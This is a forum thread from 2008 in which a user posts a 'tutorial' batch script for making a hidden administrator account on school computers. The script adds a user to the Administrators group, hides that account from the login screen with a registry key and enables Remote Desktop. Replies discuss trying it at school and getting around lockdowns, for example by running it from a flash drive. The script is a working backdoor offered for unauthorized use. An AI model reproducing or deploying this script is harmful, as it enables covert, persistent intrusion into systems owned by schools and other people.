View previous topic :: View next topic |
Author |
Message |
AdamWest Master Cheater
Reputation: 0
Joined: 05 Jul 2007 Posts: 354 Location: Quahog, Rhode Island
|
Posted: Tue Apr 29, 2008 8:54 pm Post subject: [Tutorial] Making a HIDDEN Admin Account (works at school) |
|
|
Me and my friend made this yesterday...You can use this to make an admin account, and it works on MOST school systems.
I don't take any responsibility in the actions of idiots. THIS IS EDUCATIONAL ONLY.
Step 1
Open Notepad
Step 2
Paste in this code:
Code: | @Echo Off
SET /P usr=[Enter new username here:]
SET /P pwd=[Enter new password here:]
:: SET /P takes the user input and puts it into the variable.
echo — Creating New User, “%usr%” with password “%pwd%” –
net user “%usr%” “%pwd%” /add
echo — Adding User to Group Administrator –
net localgroup Administrators %usr% /add
echo — User Is Now Administrator — >>
echo — Hidding User –
REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v %usr% /t REG_DWORD /d 0 /f
echo — Activating Terminal Service –
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0
echo — Activating Terminal Service Done –
SET /P =Press Enter to continue . . .
Exit |
Step 3
Save the file as a .bat to your desktop (or another person's hard drive section...lol)
Step 4
Run the .bat, and enjoy. Totally hidden Admin account.
_________________
"I myself am made entirely of flaws, stitched together with good intentions." - Augusten Burroughs |
|
Back to top |
|
 |
Ajax Grandmaster Cheater Supreme
Reputation: 0
Joined: 28 Jan 2008 Posts: 1545
|
Posted: Tue Apr 29, 2008 9:47 pm Post subject: |
|
|
This is cool. I'll try it out when I go to school tomorrow.
_________________
http://forum.cheatengine.org/search.php < The almighty power of this forum =]
Every time someone uses my siggy, a noob dies, and a human being is born.
Drivers are always the answer to everything. |
|
Back to top |
|
 |
iTz SWAT I post too much
Reputation: 1
Joined: 20 Dec 2007 Posts: 2227 Location: Me.Location;
|
Posted: Wed Apr 30, 2008 3:13 am Post subject: |
|
|
I haven't tried but if it is hidden, how do you Log in ?
_________________
|
|
Back to top |
|
 |
tmocky How do I cheat?
Reputation: 1
Joined: 30 Oct 2006 Posts: 2437
|
Posted: Wed Apr 30, 2008 6:47 am Post subject: |
|
|
Any somewhat well-protected school system will block MS-DOS commands (this includes batch scripting), so I'd be surprised if it'll actually work anywhere.
_________________
For the no-lifers amongst us. [X]
L. Casei Defensis. |
|
Back to top |
|
 |
AdamWest Master Cheater
Reputation: 0
Joined: 05 Jul 2007 Posts: 354 Location: Quahog, Rhode Island
|
Posted: Wed Apr 30, 2008 1:26 pm Post subject: |
|
|
tmocky wrote: | Any somewhat well-protected school system will block MS-DOS commands (this includes batch scripting), so I'd be surprised if it'll actually work anywhere.  |
Thanks for trying to flame me. But, you fail.
AdamWest wrote: | Me and my friend made this yesterday...You can use this to make an admin account, and it works on MOST school systems. |
Works at my school, and it works well.
_________________
"I myself am made entirely of flaws, stitched together with good intentions." - Augusten Burroughs |
|
Back to top |
|
 |
Psy Grandmaster Cheater Supreme
Reputation: 1
Joined: 27 Mar 2008 Posts: 1366
|
Posted: Wed Apr 30, 2008 1:41 pm Post subject: |
|
|
Depends on what school it is.
Some are like they should be, locked-down quite tightly, whereas others are pretty much wide-open or have certain permissions set that can be easily bypassed. No-one is right to say either "it will work on all systems", or "it won't work at all"....
|
|
Back to top |
|
 |
SF I'm a spammer
Reputation: 119
Joined: 19 Mar 2007 Posts: 6028
|
Posted: Wed Apr 30, 2008 2:19 pm Post subject: |
|
|
Won't work on mine, we get an 'action has been restricted by your network administrator' when doing anything with registry files. The rest may work, BUT they watch what every PC does, so we'd still get busted.
_________________
|
|
Back to top |
|
 |
AdamWest Master Cheater
Reputation: 0
Joined: 05 Jul 2007 Posts: 354 Location: Quahog, Rhode Island
|
Posted: Wed Apr 30, 2008 2:42 pm Post subject: |
|
|
SaviourFamily wrote: | Won't work on mine, we get an 'action has been restricted by your network administrator' when doing anything with registry files. The rest may work, BUT they watch what every PC does, so we'd still get busted. |
Easily bypassed...what kind of security setup does your school have? Mine uses a custom one...
_________________
"I myself am made entirely of flaws, stitched together with good intentions." - Augusten Burroughs |
|
Back to top |
|
 |
Lorrenzo Moderator
Reputation: 4
Joined: 02 Jun 2006 Posts: 3744
|
Posted: Wed Apr 30, 2008 3:02 pm Post subject: |
|
|
How do you log on it if it's 'hidden'
|
|
Back to top |
|
 |
ebiru Cheater
Reputation: 0
Joined: 27 Apr 2008 Posts: 44
|
Posted: Wed Apr 30, 2008 3:03 pm Post subject: |
|
|
Lorrenzo wrote: | How do you log on it if it's 'hidden' |
crtl + alt + dele
enter user name
enter password
|
|
Back to top |
|
 |
Lorrenzo Moderator
Reputation: 4
Joined: 02 Jun 2006 Posts: 3744
|
Posted: Wed Apr 30, 2008 3:16 pm Post subject: |
|
|
isn't working for me.
Password doesnt work, and it doesnt make it admin.
|
|
Back to top |
|
 |
Smart Grandmaster Cheater
Reputation: 0
Joined: 19 Jan 2007 Posts: 697 Location: New Zealand
|
Posted: Wed Apr 30, 2008 3:35 pm Post subject: |
|
|
what if im using a mac?
theres no notepad.
_________________
|
|
Back to top |
|
 |
NeverForgotten Grandmaster Cheater Supreme
Reputation: 2
Joined: 20 Oct 2007 Posts: 1616 Location: Wii
|
Posted: Wed Apr 30, 2008 4:04 pm Post subject: |
|
|
Smart wrote: | what if im using a mac?
theres no notepad. |
Ya my school has gey macs
_________________
|
|
Back to top |
|
 |
tjake Grandmaster Cheater Supreme
Reputation: 0
Joined: 05 Feb 2007 Posts: 1927 Location: At Your Bed Sleeping
|
Posted: Wed Apr 30, 2008 4:35 pm Post subject: |
|
|
what if ur school computer doesnt have notepad?
my school computer has nothing but,
paint and calculator.
they wont let u right click on anything but on websites.
they only got the supplies for what we use.
|
|
Back to top |
|
 |
Lorrenzo Moderator
Reputation: 4
Joined: 02 Jun 2006 Posts: 3744
|
Posted: Wed Apr 30, 2008 5:02 pm Post subject: |
|
|
tjake wrote: | what if ur school computer doesnt have notepad?
my school computer has nothing but,
paint and calculator.
they wont let u right click on anything but on websites.
they only got the supplies for what we use. |
Flash drive it.
|
|
Back to top |
|
 |
|